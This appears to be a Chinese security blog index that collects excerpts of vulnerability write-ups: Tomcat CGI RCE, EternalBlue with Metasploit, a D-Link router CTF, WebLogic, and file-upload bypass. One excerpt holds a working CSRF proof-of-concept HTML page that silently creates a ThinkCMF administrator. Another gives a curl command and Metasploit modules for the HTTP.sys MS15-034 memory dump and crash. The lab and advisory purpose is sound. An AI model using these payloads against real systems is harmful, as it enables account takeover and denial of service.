漏洞

Tomcat CGIServlet enableCmdLineArguments远程代码执行_CVE-2019-0232漏洞复现

匿名 (未验证) 提交于 2019-12-02 23:49:02
Tomcat CGIServlet enableCmdLineArguments远程代码执行_CVE-2019-0232漏洞复现 一、漏洞描述 该漏洞是由于tomcat CGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令注入影响。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。 该漏洞只影响windows平台,要求启用CGI Servlet和enableCmdLineArguments参数。但是CGI Servlet默认关闭, enableCmdLineArguments在tomcat 9.0之后默认关闭 触发该漏洞需要同时满足以下条件: 1、 系统为windows 2、 启用了CGI Servlet(默认为关闭) 3、 启用了enableCmdLineArguments(tomcat 9.0之后默认为关闭) 二、影响版本 Apache Tomcat 9.0.0.M1 to 9.0.17 Apache Tomcat 8.5.0 to 8.5.39 Apache Tomcat 7.0.0 to 7.0.93 三、漏洞环境 目标机:windows 7 jdk_8u71 apache tomcat 8.5.2 1、 java环境搭建,jdk下载、安装 下载地址:http://www.oracle.com

安全开发

匿名 (未验证) 提交于 2019-12-02 23:49:02
1 Python介绍与入门 1、Python简介 Python是一种计算机程序设计语言。是一种动态的、面向对象的脚本语言,最初被设计用于编写自动化脚本(shell),随着版本的不断更新和语言新功能的添加,越来越多被用于独立的、大型项目的开发。 Python是一种解释型脚本语言,可以应用于以下领域: Web 和 Internet开发 科学计算和统计 教育 桌面界面开发 软件开发 2 使用Python实现端口扫描 1、扩展阅读 1、常见端口扫描类型及原理:[常见的端口扫描类型及原理 - whatday的专栏 - CSDN博客](https://blog.csdn.net/whatday/article/details/45504961) 2、NMap Python 库:[python-nmap ・ PyPI](https://pypi.org/project/python-nmap/) 3、Socket模块文档:[18.1. socket ― Low-level networking interface ― Python 3.6.7rc1 documentation](https://docs.python.org/3.6/library/socket.html) 4、Scapy 官方文档:https://scapy.readthedocs.io/en/latest/usage

2019年7月安全分享会摘要

匿名 (未验证) 提交于 2019-12-02 23:49:02
一、P2P金融行业web安全检测项即监管要求: 二、OWASP TOP 10: 三、SQL注入漏洞的原理和利用 SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。攻击者利用有针对性的解释器语法发送简单的、基于文本的攻击。几乎任何数据源都能成为注入载体,包括内部来源。注入漏洞的本质是原本代码拼接了用户可控数据,导致原本代码语义混淆而导致的安全缺陷。 SQL安全现状: 没有统一的安全编码规范。 风险: 上得了机器权限,下得了数据,数据库被脱裤,管理员和重要人员信息泄露,获得Webshell,系统sa权限以及root权限。 注入类型: 1.常见的注入类型有:布尔盲注,时间盲注,报错注入,联合查询注入,堆叠查询注入。 2.按照攻击入口分:GET型的SQL注入、POST型的注入、Cookie型的注入等。 3.按照注入点类型分:整型注入、字符型注入等。 SQL注入漏洞的产生(以Mysql+PHP为例): 1、使用动态拼接的SQL语句 2、页面异常信息(错误信息)处理不当 3、未判断变量传入合法性 使用工具 优点: 自动化、范围广、效率高 缺点: 误报、漏报、测试方法有限 手工测试 优点: 测试方法灵活 缺点: 效率低、范围窄、因测试者技术水平而异 四、失效的身份验证和会话管理

Metaploit-永恒之蓝漏洞利用

匿名 (未验证) 提交于 2019-12-02 23:47:01
Ŀ¼ 一、原理及目的 windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 攻击机 靶机 windows7x64未打永恒之蓝补丁且关闭防火墙) 三、测试过程及总结 1.进入metaploit工具使用命令:msfconsole,可以看出下面有总共有六个模块,一定要知道对应模块的功能,才知道如何进行运用,这应该是该工具的核心功能模块。 辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块nops)、编码器模块(encoders)msf为总模块,其他均为分支模块。Metaploit的版本号为metasploit v4.17.3-dev 2.要利用永恒之蓝漏洞,那么就要使用其中的渗透攻击(exploit)模块,对其进行渗透攻击,利用ms17_010_eternalblue漏洞 3.设置攻击主机、靶机地址,确定攻击端口 a. b. 3.确定端口开放、版本 一定注意: 1

QWB2019线下Real World-Router WP

匿名 (未验证) 提交于 2019-12-02 23:43:01
0x00前言 今年强网杯线下只有PWN,Web狗觉得要来旅游了,不过看到Real World部分上来发了个D-Link路由器,还是决定玩一下,毕竟毕设中玩了不少路由器还是有点经验的。至于其他的题目,就只能看神仙打架了:P,膜手日Chrome、Qemu、各种CMS的大佬。 0x01题目 拿到一个D-Link DIR-859劲路由、串口调试设备和路由器固件。看到TTL转USB设备先去焊了会板子但我也不会在线调试栈溢出,就去解压固件了。注意这里binwalk和firmware-mod-kit不能直接解压,要先用dd切一下文件: dd if = DIR859Ax_FW106b01_beta01_patch.bin of = DIR-859.img bs = 1310868 skip = 1 ./unsquashfs_all.sh DIR-859.img 可以看到版本是B-1.06,而官网最新的固件型号是B-1.05,这两个固件差不多,cgibin大小有点不同,考虑后面比对一下。题目要求是拿到路由器shell,打开telnet服务,并在/tmp目录下面写指定文件。 0x02初步分析 首先先去CVE搜一下,当然不出意外的是没有CVE漏洞,题目中也说明了是主办方挖出了漏洞,已经通报厂商,但是还没有修补,但是现在看来其历史漏洞也没有。 打开路由器管理页面,与DIR

ThinkCMF存在CSRF漏洞可创建管理员账号

匿名 (未验证) 提交于 2019-12-02 23:43:01
thinkCMF官网: https://www.thinkcmf.com/ 一、POC 当管理员登录后,打开包含以下内容的网页,就会自动创建一个管理员账号。 注:需要把url变量中的http://tp.im更改为安装时设置的域名。 以下内容保存为一个html网页,如test.html。 <html><body> <script type="text/javascript"> function post(url, fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild(p); p.submit(); } function csrf_hack() { var fields; fields += " <input type=\"hidden\" name=\"user_login\" value=\"CSRFadministrator\" />"; fields += " <input type=\"hidden\" name=\"user_pass\" value=\"admin1234\" />"; fields += " <input

WebLogic 反序列化0day漏洞(CVE-2019-2725补丁绕过)预警

匿名 (未验证) 提交于 2019-12-02 23:43:01
0x00 事件背景 2019年06月15日,360CERT监测到在野的Oracle Weblogic远程反序列化命令执行漏洞,该漏洞绕过了最新的Weblogic补丁(CVE-2019-2725),攻击者可以发送精心构造的恶意HTTP请求,在未授权的情况下远程执行命令。目前官方补丁未发布,漏洞细节未公开。360CERT经研判后判定该漏洞综合评级为“高危”,强烈建议受影响的用户尽快根据临时修补建议进行临时处置,防止收到攻击者攻击。 PHP大马 0x01 漏洞细节 该漏洞是针对2019年4月Weblogic补丁的绕过,主要是由于支持Weblogic的JDK版本存在缺陷而导致攻击者可以绕过补丁在远程执行任意命令。 0x02 影响范围 影响产品: Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 影响组件: wls9_async_response.war wls-wsat.war 0x03 修复建议 删除wls9_async_response.war和wls-wsat.war文件及相关文件夹并重启Weblogic服务。具体路径为: 10.3.*版本: 奇热影视 \Middleware\wlserver_10.3\server\lib\ %DOMAIN_HOME%\servers\AdminServer\tmp\

文件上传---文件上传漏洞验证的三种基本方法

匿名 (未验证) 提交于 2019-12-02 23:39:01
服务器如何验证上传文件格式的 文件头验证 如PE的MZ头,JPG的JFIF等等,GIF的GIF89a 文件类型验证 burp suite抓包看到上传图片类型为content-type:img/jpeg 伪造文件类型绕过 文件后缀验证 命名绕过:xxx.jpg.asp 文章来源: https://blog.csdn.net/hhj_still/article/details/91399009

HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034)

匿名 (未验证) 提交于 2019-12-02 23:38:02
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034) 后来我发现世界真的很大,没有刻意地见面,就真没有再见过了 漏洞概述: 漏洞版本: Windows 7 Windows Server 2008 R2 Windows 8、Windows 8.1 Windows Server 2012、Windows Server 2012 R2 漏洞检测: 简单粗暴一句话,判断是否存在The requested range is not satisfiable。 curl http://ip/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"|grep "The requested range is not satisfiable" 漏洞利用: 获取服务器内存数据 利用msf下的auxiliary/scanner/http/ms15_034_http_sys_memory_dump,设置ip端口即可。 蓝屏攻击 利用msf下的auxiliary/dos/http/ms15_034_ulonglongadd ,设置ip端口即可(生产环境,请勿使用,小心限量版玫瑰金)。 漏洞修复: 打补丁。 余生很长,请多指教。 文章来源: https://blog.csdn.net/csacs/article